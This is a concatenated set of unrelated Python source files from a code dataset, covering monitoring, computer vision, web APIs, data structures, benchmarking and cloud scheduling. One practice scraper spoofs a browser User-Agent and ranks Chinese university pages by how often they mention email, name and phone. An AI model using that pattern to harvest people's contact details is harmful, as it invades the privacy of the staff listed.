tools import logging\nimport urllib, re\nimport psutil\n\nip_url = \"http://1212.ip138.com/ic.asp\"\nip_re = re.compile(\"\\[([0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3})\\]\")\n\nclass Network(TrivalEvent):\n \"\"\" Get Disk's status of Raspberry\n Get Disk's status of Raspberry.\n \"\"\"\n\n @property\n def bytes_sent(self):\n return self.get(\"bytes_sent\")\n\n @property\n def bytes_recv(self):\n return self.get(\"bytes_recv\")\n\n @property\n def errin(self):\n return self.get(\"errin\")\n\n @property\n def errout(self):\n return self.get(\"errout\")\n\n @property\n def ip(self):\n return self.get(\"ip\")\n\n @staticmethod\n def get_ip():\n ip = \"\"\n try:\n req = urllib.urlopen(ip_url)\n s = req.read().decode(\"gb2312\").encode('utf-8')\n ip = ip_re.findall(s)[0]\n except IndexError:\n logging.warning(\"response format unexpected\")\n except Exception:\n logging.warning(\"can not get ip\")\n\n return ip\n\n def packed(self):\n (bs, br, ps, pr, errin, errout, dropin, dropout) = psutil.net_io_counters()\n self.set(\"bytes_sent\", bs / 1024 / 1024)\n self.set(\"bytes_recv\", br / 1024 / 1024)\n\n self.set(\"errin\", errin)\n self.set(\"errout\", errout)\n self.set(\"unit\", \"MB\")\n\n ip = self.get_ip()\n self.set(\"ip\", ip)\n\n @repeat(\"NetWork\", 30 * 60, -1)\n def do(self):\n self.packed()\n self.save()\n\n\nexports = [\n {\n \"class\": Network,\n \"delay\": 30 * 60,\n \"msg\": u\"获取网络状态包括公网ip\"\n }\n]\n","sub_path":"local/events/Network.py","file_name":"Network.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"343183516","text":"import urllib.request as urst\r\nfrom bs4 import BeautifulSoup as bs\r\nimport re\r\n\r\nurl = input('Paste an address here: ')\r\nheader = ('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) '\r\n 'AppleWebKit/537.36 (KHTML, like Gecko) '\r\n 'Chrome/63.0.3239.132 Safari/537.36')\r\n# to build up a header, disguising the end server\r\nopener = urst.build_opener()\r\nopener.addheaders = [header]\r\n\r\n\r\n# to compile a whole bunch of result in a binary string by a function\r\ndef org_string(url):\r\n binary_string = opener.open(url).read()\r\n # print(binary_string) # this is used for testing\r\n return(binary_string)\r\n\r\n''' get all links from parent page by searching its binary string \r\n(1st argument called: binary_string) with REGULAR EXPRESSION\r\n(2nd argument called: re_sentense) and save them in a list represented by a function '''\r\ndef get_links(binary_string, re_sentense):\r\n soup = bs(binary_string, 'html.parser', from_encoding='utf-8')\r\n links_list = [] # local\r\n # if ... to distinguish which situation should be applied to which searching mode\r\n for link in soup.findAll({'a', 'div', 'span', 'li'}, {'href': re.compile(re_sentense)}):\r\n try:\r\n links_list.append(link.get('href'))\r\n except:\r\n continue\r\n # print(links_list)\r\n return(links_list)\r\n\r\n''' to filter the links within a list (1st argument called: links_list) by defining \r\na threshold number (2nd argument called: threshold) and the following key words \r\n(3rd argument called: key_words) using this function '''\r\ndef filter(links_list, threshold, *key_words):\r\n target_links = []\r\n relation = []\r\n for link in links_list:\r\n try:\r\n b_data = org_string(link)\r\n num = int()\r\n for kw in key_words:\r\n c = b_data.count(kw.encode())\r\n num = num + c\r\n relation.append(num)\r\n except:\r\n continue\r\n print(relation)\r\n\r\n for i in range(len(relation)):\r\n high_ratio = relation[i]\r\n if high_ratio >= threshold:\r\n target_links.append(links_list[i])\r\n return(target_links)\r\n\r\ndata = org_string(url)\r\n# print(data)\r\nlinks = get_links(data, '^http://.{1,}[.]edu[.]cn/.*/.*')\r\nprint(links)\r\nleft = filter(links, 1, '邮箱', '姓名', '电话', '师') #'科研', '实验', '光', '力', '分子')\r\nprint(left)\r\n\r\n","sub_path":"01_Python_Lecture_Series/py_Scripts_Practice/advance wsp.py","file_name":"advance wsp.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"624089611","text":"# Given an array nums, write a function to move all 0's to the end of it while maintaining the relative order of the non-zero elements.\n\nclass Solution:\n def moveZeroes(nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n # tail = 0\n # for num in nums:\n # if num != 0:\n # nums[tail] = num\n # tail += 1\n # for i in range(tail, len(nums)):\n # nums[i] = 0\n\n # print(moveZeroes([0,1,2,0,4]))\n zeros = 0\n count = 0\n for i in nums:\n if i == 0:\n zeros+=1\n for i in range(len(nums)):\n if nums[i] == 0:\n count += 1\n continue\n nums[i-count] = nums[i]\n for i in range(len(nums)-count,len(nums)):\n nums[i] = 0\n\n print(moveZeroes([0,0,0,1,2,3]))","sub_path":"edgeOfTheOcean/moveZeroes.py","file_name":"moveZeroes.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"420652084","text":"import sys\nimport cv2\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nfrom util import *\nfrom PIL import Image\nfrom skimage.transform import resize\n\n# label\n# 23 0.770336 0.489695 0.335891 0.697559\n# 23 0.185977 0.901608 0.206297 0.129554\n\nwith open('/Users/vng/Documents/yolov3_pytorch/data/coco.names', 'r') as file:\n obj_names = [x.strip() for x in file.readlines()]\n\ndef scale_image(image_path, label_path, img_shape=(416, 416)):\n # img = cv2.imread(image_path)\n # img_arr = letterbox_image(img, (416, 416))\n # cv2.imwrite(\"/Users/vng/Documents/yolov3_pytorch/test/process_image.jpg\", img)\n\n img = np.array(Image.open(image_path))\n h, w, _ = img.shape\n dim_diff = np.abs(h - w)\n pad1, pad2 = dim_diff // 2, dim_diff - dim_diff // 2\n pad = ((pad1, pad2), (0, 0), (0, 0)) if h <= w else ((0, 0), (pad1, pad2), (0, 0))\n input_img = np.pad(img, pad, 'constant', constant_values=128) / 255.\n padded_h, padded_w, _ = input_img.shape\n input_img = resize(input_img, (*img_shape, 3), mode='reflect')\n\n labels = np.loadtxt(label_path).reshape(-1, 5)\n x1 = w * (labels[:, 1] - labels[:, 3] / 2)\n y1 = h * (labels[:, 2] - labels[:, 4] / 2)\n x2 = w * (labels[:, 1] + labels[:, 3] / 2)\n y2 = h * (labels[:, 2] + labels[:, 4] / 2)\n\n x1 += pad[1][0]\n y1 += pad[0][0]\n x2 += pad[1][0]\n y2 += pad[0][0]\n\n labels[:, 1] = ((x1 + x2) / 2) / padded_w\n labels[:, 2] = ((y1 + y2) / 2) / padded_h\n labels[:, 3] *= w / padded_w\n labels[:, 4] *= h / padded_h\n\n show_image(input_img, labels)\n\ndef show_image(img, labels):\n # img = img / 255.0\n # plt.imshow(img[:,:,[2,1,0]])\n h, w, _ = img.shape\n\n fig, ax = plt.subplots(1)\n plt.axis(\"off\")\n ax.imshow(img)\n\n for label in labels:\n obj = obj_names[int(label[0])]\n c_x = label[1] * w\n c_y = label[2] * h\n bb_w = label[3] * w\n bb_h = label[4] * h\n bb_x = c_x - bb_w/2\n bb_y = c_y - bb_h/2\n\n t = ax.text(bb_x, bb_y, obj, fontsize=8)\n t.set_bbox(dict(facecolor='red', alpha=0.5))\n rect = patches.Rectangle((bb_x, bb_y), bb_w, bb_h, linewidth=1.5, edgecolor='r', facecolor='none')\n ax.add_patch(rect)\n plt.show()\n\nif __name__ == '__main__':\n scale_image(\"/Users/vng/PycharmProjects/PyTorch-YOLOv3/data/coco/images/train2014/COCO_train2014_000000000094.jpg\",\n \"/Users/vng/PycharmProjects/PyTorch-YOLOv3/data/coco/labels/train2014/COCO_train2014_000000000094.txt\")\n # scale_image(sys.argv[1], sys.argv[2])\n","sub_path":"test/scale_image.py","file_name":"scale_image.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"650423589","text":"\nimport sys\nimport numpy as np\nimport pdb\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import ode\nfrom INapIKModel import INapIKModel\nfrom utils import buildMatrixFromArraysList\n\ndef main(argv):\n v0 = -60.00\n n0 = 0.0008\n t0 = 0.0\n tf = 300.0\n current0 = 0.0\n currentf = 10.0\n dt = 1e-3\n resultsFilename = 'results/integrationINapIKFig4-29.npz'\n\n iSlope = (currentf-current0)/(tf-t0)\n def i(t, iSlope=iSlope):\n return(iSlope*t)\n iNapIKModel = INapIKModel.getHighThresholdInstance(i=i)\n # integrator = ode(iNapIKModel.deriv).set_integrator('vode', max_step=dt)\n integrator = ode(iNapIKModel.deriv).set_integrator('vode')\n\n y0 = [v0, n0]\n integrator.set_initial_value(y0, t0)\n ys = [y0]\n times = [t0]\n currents = [i(t0)]\n\n step = 0\n t = t0\n y = y0\n successfulIntegration = True\n while successfulIntegration and t Character:\n char_data = CharacterData(\n ChassisData(attribute_modifiers={Attributes.MAX_HEALTH: health}))\n return build_character(data=char_data)\n\n\ndef _create_combat_controller(enemy) -> CombatSceneController:\n return cast(CombatSceneController, build_controller(CombatScene([enemy])))\n\n\ndef test_game_over():\n enemy = _create_enemy(10)\n ctl = _create_combat_controller(enemy=enemy)\n\n assert not ctl.scene.is_resolved()\n\n enemy.status.increment_attribute(Attributes.HEALTH, -10)\n assert ctl.scene.is_resolved()\n\n\ndef test_selected_enemy():\n enemy = _create_enemy(2)\n ctl = _create_combat_controller(enemy)\n assert selected_char(ctl.scene.layout) is None\n\n click_on_char(enemy, ctl.scene.layout)\n\n assert selected_char(ctl.scene.layout) is not None\n assert selected_char(ctl.scene.layout) == enemy\n\n simulate_mouse_click(-1000, -1000)\n assert selected_char(ctl.scene.layout) is None\n\n\ndef test_enemy_unselected_after_move():\n enemy = _create_enemy(2)\n ctl = _create_combat_controller(enemy)\n assert selected_char(ctl.scene.layout) is None\n\n click_on_char(enemy, ctl.scene.layout)\n\n assert selected_char(ctl.scene.layout) is enemy\n\n simulate_key_press('1')\n assert selected_char(ctl.scene.layout) is None\n\n\ndef test_reclick_unselects():\n enemy = _create_enemy(2)\n ctl = _create_combat_controller(enemy)\n assert selected_char(ctl.scene.layout) is None\n\n click_on_char(enemy, ctl.scene.layout)\n\n assert selected_char(ctl.scene.layout) is enemy\n\n click_on_char(enemy, ctl.scene.layout)\n assert selected_char(ctl.scene.layout) is None\n\n\ndef test_click_nothing_selects_nothing():\n enemy = _create_enemy(2)\n ctl = _create_combat_controller(enemy)\n assert selected_char(ctl.scene.layout) is None\n\n simulate_mouse_click(-100, -100)\n\n assert selected_char(ctl.scene.layout) is None\n","sub_path":"src/controllers/tests/combat_scene_controller_test.py","file_name":"combat_scene_controller_test.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"29089844","text":"import os\nimport yaml\n\n# Set defaults\ndatabase = dict(\n db_host = 'slurm.server.com',\n db_user = 'username',\n db_pass = 'password',\n db_name = 'acct_database',\n table_assoc = 'slurm_assoc_table',\n table_job = 'slurm_job_table',\n)\n\n# Change to yaml values\nymlfile = None\nif os.path.exists(\"config.yml\"):\n ymlfile = open(\"config.yml\", 'r')\nelif os.path.exists(os.environ['SLURM_REST_API_CONFIG']):\n ymlfile = open(os.environ['SLURM_REST_API_CONFIG'], 'r')\n\nif ymlfile is not None:\n try:\n cfg = yaml.load(ymlfile)\n if cfg is not None and 'database' in cfg:\n for n in cfg['database']:\n database[n] = cfg['database'][n]\n finally:\n ymlfile.close()\n","sub_path":"slurm-rest-api/acctapi/config/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"579438665","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom flask import Blueprint, session, render_template, abort, request, jsonify\nimport mysql.connector\nimport secret\nfrom handler.pet import filterPet\nfrom handler.moment import petsMoment\nfrom handler.message import numNew\n\n\nexplore_routes = Blueprint('explore_routes', __name__, template_folder = 'templates')\nconfig = secret.mysql()\n\n\n#Get explore\n@explore_routes.route('/explore')\ndef exploreHome():\n if session.get('userName') is not None:\n visitorName = session['userName']\n visitorId = session['userId']\n cnx = mysql.connector.connect(**config)\n try:\n num = numNew(visitorId, cnx)\n num = num[0]\n finally:\n cnx.close()\n else:\n visitorName = None\n visitorId = None\n num = None\n return render_template('explore.html', name = visitorName, id = visitorId, num = num)\n\n#load 20 moments\n@explore_routes.route('/explore/getMoment', methods = ['GET', 'POST'])\ndef getMoment():\n #only response to post request\n if request.method == 'POST':\n type = int(request.form['type'])\n nature = int(request.form['nature'])\n load = int(request.form['load']) * 20\n cnx = mysql.connector.connect(**config)\n #get all filter pets\n try:\n pets = filterPet(type, nature, cnx)\n if pets == '0':\n return str(0)\n if len(pets) != 0:\n #Get all pets id in list\n allId = [x[0] for x in pets]\n moments = petsMoment(allId, load, cnx)\n #return 0 for db error\n if moments == '0':\n return str(0)\n #not pets, no moments\n else:\n moments = []\n finally:\n cnx.close()\n return jsonify(moments)\n else:\n abort(404)","sub_path":"routes/explore.py","file_name":"explore.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"137726923","text":"#!/usr/bin/env python3\nfrom typing import List\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\nfrom pathlib import Path\n\nfrom config import configuration\nfrom core.benchmark import Benchmark\nfrom core.utils.charts import star_chart, plot_stacked_bar, plot_heatmap, plot_venn3\nfrom core.utils.results import ToolResults\nfrom core.utils.stream import progress\n\n\nbenchmark = Benchmark(config=configuration, seed=8888)\nbenchmark.verbose = False\nchallenges_count = len(benchmark.challenges)\npatches = {}\n\nfor i, cn in enumerate(benchmark.challenges):\n progress(i+1, challenges_count, suffix=f\"Querying patch for {cn}\")\n patches[cn] = benchmark.patch(cn)\n\nparser = argparse.ArgumentParser(prog=\"compare\", description='Compares tools results')\nparser.add_argument(\"--seed\", type=int, help=\"The seed number of the results\", default=0)\nparser.add_argument(\"--plot\", choices=[\"stacked\", \"star\", \"heatmap\", \"venn\"], required=True,\n type=str, help=\"The seed number of the results\")\ntools_timeout = configuration.tools_timeout\ncolors_list = ['b', 'g', 'r', 'c', 'm', 'y', 'k', 'orange', 'gray', 'brown', 'lime', 'tan', 'teal']\n\n\ndef get_tools_results(results_dir: Path, seed_target: int = 0):\n return [ToolResults(tool, tools_timeout, patches, seed_target) for tool in results_dir.iterdir() if tool.is_dir()]\n\n\ndef plot_ranks(scores: List[int], tools: List[str], colors: List[str]):\n axes = plt.gca()\n axes.set_ylim([0, 3])\n y_pos = [i for i in range(len(tools))]\n plt.bar(y_pos, scores, color=colors)\n plt.xticks(y_pos, tools)\n plt.ylabel('Score')\n plt.title('Tools ranking')\n plt.show()\n\n\ndef plot_star(star_data: List[ToolResults], challenges_count: int):\n tools_names = [tool.name for tool in star_data]\n tools_count = len(tools_names)\n tools_metrics = [tool() for tool in star_data]\n tools_results = [list(metrics.values()) for metrics in tools_metrics]\n spoke_labels = [list(metrics.keys()) for metrics in tools_metrics]\n\n star_chart(tools_results, spoke_labels=spoke_labels[0], colors=colors_list[:tools_count], labels=tools_names,\n title=f\"{tools_count} tools' profiling on {challenges_count} challenges with {len(spoke_labels[0])} metrics.\")\n\n\ndef plot_stacked(data: List[List[float]], series_labels: List[str], category_labels: List[str]):\n labels_count = len(series_labels)\n colors = colors_list[:labels_count]\n print(data)\n plot_stacked_bar(\n data,\n series_labels,\n category_labels=category_labels,\n show_values=True,\n value_format=\"{:.1f}\",\n colors=colors,\n y_label=\"Score\"\n )\n\n plt.savefig('bar.png')\n plt.show()\n\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n# scores = get_scores(args.seed)\n# print(scores)\n #challenges = benchmark.get_challenges()\n# ranks = [sum(score)/len(challenges) for score in scores.values()]\n# plot_ranks(ranks, list(scores.keys()), ['red', 'green', 'yellow'])\n results_path = configuration.paths.out_dir\n results = get_tools_results(results_path, args.seed)\n if args.plot == \"star\":\n plot_star(results, 69)\n elif args.plot == \"stacked\":\n tools_names = [tool.name for tool in results]\n tools_performance = [tool.performance() for tool in results]\n print(tools_performance)\n performance_labels = [list(tp.keys()) for tp in tools_performance]\n plot_stacked(data=np.transpose([list(tp.values()) for tp in tools_performance]), series_labels=performance_labels[0],\n category_labels=tools_names)\n elif args.plot == \"heatmap\":\n tools_names = [tool.name for tool in results]\n challenges_names = [[cr.path.parent.name for cr in tool.challenge_results] for tool in results]\n tools_fix_score = [[cr.metrics.fix_score for cr in tool.challenge_results] for tool in results]\n plot_heatmap(matrix=tools_fix_score, x_labels=challenges_names[0], y_labels=tools_names,\n title=\"Fixed challenges heatmap\")\n elif args.plot == \"venn\":\n tools_names = tuple(tool.name for tool in results)\n tools_results = tuple(set(cr.path.parent.name for cr in tool.challenge_results if cr.stats.fix) for tool in results)\n plot_venn3(subsets=tools_results, labels=tools_names)\n","sub_path":"scripts/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"236030531","text":"class Stack(object):\n def __init__(self):\n self._list = []\n\n def __str__(self):\n return str(self._list)\n\n def __len__(self):\n return len(self._list)\n\n def push(self, item):\n self._list.append(item)\n\n def pop(self):\n try:\n return self._list.pop()\n except IndexError:\n raise IndexError('pop from empty stack')\n\n def peek(self):\n try:\n return self._list[-1]\n except IndexError:\n raise IndexError('peek into empty stack')\n\n\ndef main():\n st = Stack()\n\n # Push and print\n for i in range(10):\n st.push(i)\n print(st)\n st.push('Hello World')\n print(st)\n\n # Get size\n print(len(st))\n\n # Pop\n print(st.pop())\n print(st)\n\n # Peek\n print(st.peek())\n print(st)\n\n # Exceptions\n while len(st): # Empty the stack\n st.pop()\n try:\n st.peek()\n except Exception as e:\n print('Exception: {0}'.format(e))\n try:\n st.pop()\n except Exception as e:\n print('Exception: {0}'.format(e))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"stack/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"49667347","text":"import random\nfrom collections import deque\nfrom math import sqrt, ceil\n\nclass User:\n def __init__(self, name):\n self.name = name\n\ndef fisher_yates_shuffle(l):\n for i in range(0, len(l)):\n random_index = random.randint(i, len(l) - 1)\n l[random_index], l[i] = l[i], l[random_index]\n\nclass SocialGraph:\n def __init__(self):\n self.last_id = 0\n self.users = {}\n self.friendships = {}\n\n def add_friendship(self, user_id, friend_id):\n \"\"\"\n Creates a bi-directional friendship\n \"\"\"\n if user_id == friend_id:\n print(\"WARNING: You cannot be friends with yourself\")\n elif friend_id in self.friendships[user_id] or user_id in self.friendships[friend_id]:\n print(\"WARNING: Friendship already exists\")\n else:\n self.friendships[user_id].add(friend_id)\n self.friendships[friend_id].add(user_id)\n\n def add_user(self, name):\n \"\"\"\n Create a new user with a sequential integer ID\n \"\"\"\n self.last_id += 1 # automatically increment the ID to assign the new user\n self.users[self.last_id] = User(name)\n self.friendships[self.last_id] = set()\n\n def populate_graph(self, num_users, avg_friendships):\n \"\"\"\n Takes a number of users and an average number of friendships\n as arguments\n\n Creates that number of users and a randomly distributed friendships\n between those users.\n\n The number of users must be greater than the average number of friendships.\n \"\"\"\n # Reset graph\n self.last_id = 0\n self.users = {}\n self.friendships = {}\n\n # Add users\n for name in range(num_users):\n self.add_user(name)\n\n # Create friendships (refer to diagram for this algorithm)\n\n # All possible friendship ID's in a group of 5:\n # 5 4 3 2\n # +-----------\n # 1 | 1 2 4 7\n # 2 | 3 5 8 \n # 3 | 6 9\n # 4 | 10\n #\n # use a random selection from 1 - 10\n # use math to figure out the corresponding coordinates\n\n # Duplications are prevented by only choosing friends with lower IDs\n num_friendships = num_users * avg_friendships // 2\n # there are a 'triangle' number of possible friendships, we can ID them all\n num_possible = (num_users - 1) * num_users // 2\n # pick a random sample\n for friendship_id in random.sample(range(1, num_possible + 1), num_friendships):\n reverse_triangle = (sqrt(8 * friendship_id + 1) - 1) / 2\n rounded = ceil(reverse_triangle)\n # get the first triangle number greater or equal to friendship_id\n next_highest_triangle = (rounded + 1) * rounded // 2\n # the difference tells us what two friends the id corresponds to\n difference = next_highest_triangle - friendship_id\n first_friend = rounded - difference\n second_friend = num_users - difference\n self.add_friendship(first_friend, second_friend)\n\n def get_all_social_paths(self, user_id):\n \"\"\"\n Takes a user's user_id as an argument\n\n Returns a dictionary containing every user in that user's\n extended network with the shortest friendship path between them.\n\n The key is the friend's ID and the value is the path.\n \"\"\"\n visited = {} # Note that this is a dictionary, not a set\n\n # Stores the next neighbors to add, and also the node one level closer\n # in order to concatenate a path \n q = deque()\n q.append((user_id, None))\n while len(q) > 0:\n user, prev = q.popleft()\n # write the path for the current user\n visited[user] = visited[prev] + [user] if prev is not None else [user]\n for neighbor in self.friendships[user]:\n if neighbor not in visited:\n q.append((neighbor, user))\n\n return visited\n\nif __name__ == '__main__':\n # sg = SocialGraph()\n # sg.populate_graph(10, 2)\n # print(sg.friendships)\n # connections = sg.get_all_social_paths(1)\n # print(connections)\n\n # question 1 and 2:\n q1_results = []\n q2_results = []\n for _ in range(1000):\n sg = SocialGraph()\n sg.populate_graph(1000, 5)\n network = sg.get_all_social_paths(1)\n network_count = len(network) - 1 # exclude self\n if network_count == 0:\n # slim chance this can happen\n continue\n \n degree_of_separation = 0\n for person in network.items():\n if person[0] != 1: # exclude self\n degree_of_separation += len(person[1]) - 1\n degree_of_separation /= network_count\n \n q1_results.append(network_count / 999)\n q2_results.append(degree_of_separation)\n\n print(\"Q1: percent of users in extended network\")\n print(sum(q1_results) / len(q1_results))\n print(\"Q2: average degree of separation\")\n print(sum(q2_results) / len(q2_results))\n\n","sub_path":"projects/social/social.py","file_name":"social.py","file_ext":"py","file_size_in_byte":5077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"387593230","text":"from view.commons.commons import Commons\nfrom view.commons.decode_commons import DecodeCommons\nfrom datetime import datetime\nfrom lib.file import File\nimport os\n\nscript_dir = os.path.dirname(__file__) \nrel_path = \"../../../examples/\"\nabs_file_path = os.path.join(script_dir, rel_path)\n\n\nclass DecodeView:\n def __init__(self,):\n super(DecodeView, self).__init__()\n\n def handle_decode_action(self, file_path: str, *args):\n file_extension = file_path.split(\"/\")[-1].split(\".\")[-1] == \"greed_compressed\"\n \n if not file_extension:\n self.show_popup(\"Não foi possível abrir o arquivo selecionado\", \"Verifique se você escolheu um arquivo no formato .greed_compressed!!\")\n return\n\n try:\n file = Commons.get_file(file_path=file_path, encode_type='rb')\n except Exception as ex:\n self.show_popup(\"Não foi possível abrir o arquivo selecionado\", \"Verifique se você escolheu um arquivo no formato .greed_compressed!!\")\n return\n\n decoded_text = DecodeCommons.get_decoded_text(file)\n\n decoded_content_path = abs_file_path + self.get_file_extension(file_path) + datetime.now().strftime(\"%Y-%m-%d_%H:%M:%S\") + \".txt\"\n\n decoded_file_path = os.path.join(decoded_content_path)\n\n File.save_file(decoded_file_path, file_content=decoded_text, type='wt')\n\n self.show_popup(\"Arquivo descomprimido com sucesso!!\", \"Você pode vê-lo na pasta:\", decoded_file_path)\n\n def get_file_extension(self, file_path: str) -> str:\n return file_path.split(\"/\")[-1].split(\".\")[0]","sub_path":"view/gui/decode/decode_view.py","file_name":"decode_view.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"185249609","text":"from django.shortcuts import render, get_object_or_404\nfrom django.http import JsonResponse\n\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\n\nfrom .serializers import TaskSerializer\nfrom .models import Task\n\n\n# Create your views here.\n\n\n\n# ## Using this \"get_object_or_404( model_name, pk=primary_key_argument )\" \n# ## is equivalent to this following code.\n\n# from django.http import Http404\n\n# def my_view(request):\n# try:\n# obj = MyModel.objects.get(pk=1)\n# except MyModel.DoesNotExist:\n# raise Http404(\"No MyModel matches the given query.\")\n\n\n\ndef basic_json_response(request):\n return JsonResponse(\"This is a basic JSON Response\", safe=False)\n\n\n\n@api_view(['GET'])\ndef apiOverview(request):\n api_urls = {\n\t\t'List':'http://127.0.0.1:8080/api/task-list/',\n\t\t'Detail View':'http://127.0.0.1:8080/api/task-detail//',\n\t\t'Create':'http://127.0.0.1:8080/api/task-create/',\n\t\t'Update':'http://127.0.0.1:8080/api/task-update//',\n\t\t'Delete':'http://127.0.0.1:8080/api/task-delete//',\n\t}\n\n return Response(api_urls)\n\n\n@api_view(['GET'])\ndef taskList(request):\n tasks = Task.objects.all() \n serializer = TaskSerializer(tasks, many=True) ## [\"many=True\"] only when many reords are to be fetched.\n serialized_data = serializer.data\n\n return Response(serialized_data)\n\n\n@api_view(['GET'])\ndef taskDetail(request, pk):\n # task_detail = Task.objects.get(id=pk)\n task_detail = get_object_or_404(Task, pk=pk) ## This will not show any error, instead, it will show a sweet \"{ \"detail\": \"Not found.\" }\" as Response (and that too in JSON Format).\n serializer = TaskSerializer(task_detail, many=False) ## [\"many=True\"] when only on single record is to be fetched.\n serialized_data = serializer.data\n\n return Response(serialized_data)\n\n\n\n@api_view(['GET'])\ndef taskDelete(request, pk):\n # task = Task.objects.get(id=pk) ## This works well but it produces an \"Django Error Message Page\" which is not likely.\n task = get_object_or_404(Task, pk=pk) ## This does not display the error page, instead, it shows \"{ \"details\": \"Not found\" } as Response in JSON Format.\n task.delete()\n\n delete_response_message = {\n # 'delete-message' : 'Item Successfully Deleted!!',\n 'delete-status' : 'success'\n }\n\n return Response(delete_response_message)\n\n\n\n@api_view(['POST'])\ndef taskCreate(request):\n serializer = TaskSerializer(data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n\n serialized_data = serializer.data\n\n return Response(serialized_data)\n\n\n\n@api_view(['PUT']) # We can also used \"POST\" request also (like, @api_view(['POST'])) and this would also work, but to make it purely for 'updating' purpose, 'PUT' is more suitable.\ndef taskUpdate(request, pk): ## The \"UPDATE\" means that the whole row(record) in the database is to be changed.\n task = Task.objects.get(pk=pk)\n # task = get_object_or_404(Task, pk=pk) ## This does not display the error page, instead, it shows \"{ \"details\": \"Not found\" } as Response in JSON Format.\n serializer = TaskSerializer(instance=task, data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n\n return Response(serializer.data)\n\n\n\n@api_view(['PATCH']) # We can also used \"POST\" request also (like, @api_view(['POST'])) and this would also work, but to make it purely for 'updating some specific fields only and not affecting the other fields', 'PATCH' is more suitable option.\ndef taskPatch(request, pk): ## The \"PATCH\" means the data of some particular field(s) is to be changed.\n # task = Task.objects.get(pk=pk) \n task = get_object_or_404(Task, pk=pk) ## This does not display the error page, instead, it shows \"{ \"details\": \"Not found\" } as Response in JSON Format.\n serializer = TaskSerializer(task, data=request.data, partial=True)\n\n if serializer.is_valid():\n serializer.save()\n\n serialized_data = serializer.data\n\n return Response(serialized_data)\n\n","sub_path":"todo_drf_api-main-working/todo_api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"549288967","text":"from google.cloud import bigquery_datatransfer\n\ntransfer_client = bigquery_datatransfer.DataTransferServiceClient()\n\n# The project where the query job runs is the same as the project\n# containing the destination dataset.\nproject_id = \"testing-123-301507\"\ndataset_id = \"sample_data\"\n\n# This service account will be used to execute the scheduled queries. Omit\n# this request parameter to run the query as the user with the credentials\n# associated with this client.\nservice_account_name = \"sample-linux@testing-123-301507.iam.gserviceaccount.com\"\n\n# Use standard SQL syntax for the query.\nquery_string = \"\"\"\nSELECT\n CURRENT_TIMESTAMP() as current_time,\n @run_time as intended_run_time,\n @run_date as intended_run_date,\n 17 as some_integer\n\"\"\"\n\nparent = transfer_client.common_project_path(project_id)\n\ntransfer_config = bigquery_datatransfer.TransferConfig(\n destination_dataset_id=dataset_id,\n display_name=\"Your Scheduled Query Name\",\n data_source_id=\"scheduled_query\",\n params={\n \"query\": query_string,\n \"destination_table_name_template\": \"mascots{20210115}\",\n \"write_disposition\": \"WRITE_TRUNCATE\",\n \"partitioning_field\": \"\",\n },\n schedule=\"every 24 hours\",\n)\n\ntransfer_config = transfer_client.create_transfer_config(\n bigquery_datatransfer.CreateTransferConfigRequest(\n parent=parent,\n transfer_config=transfer_config,\n service_account_name=service_account_name,\n )\n)\n\nprint(\"Created scheduled query '{}'\".format(transfer_config.name))","sub_path":"schedule.py","file_name":"schedule.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"321907587","text":"#!/usr/bin/env python3\n# Copyright 2021 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Posts benchmark results to GitHub as pull request comments.\n\nThis script is meant to be used by Buildkite for automation. It requires the\nfollowing environment to be set:\n\n- BUILDKITE_BUILD_URL: the link to the current Buildkite build.\n- BUILDKITE_COMMIT: the pull request HEAD commit.\n- BUILDKITE_PULL_REQUEST: the current pull request number.\n- 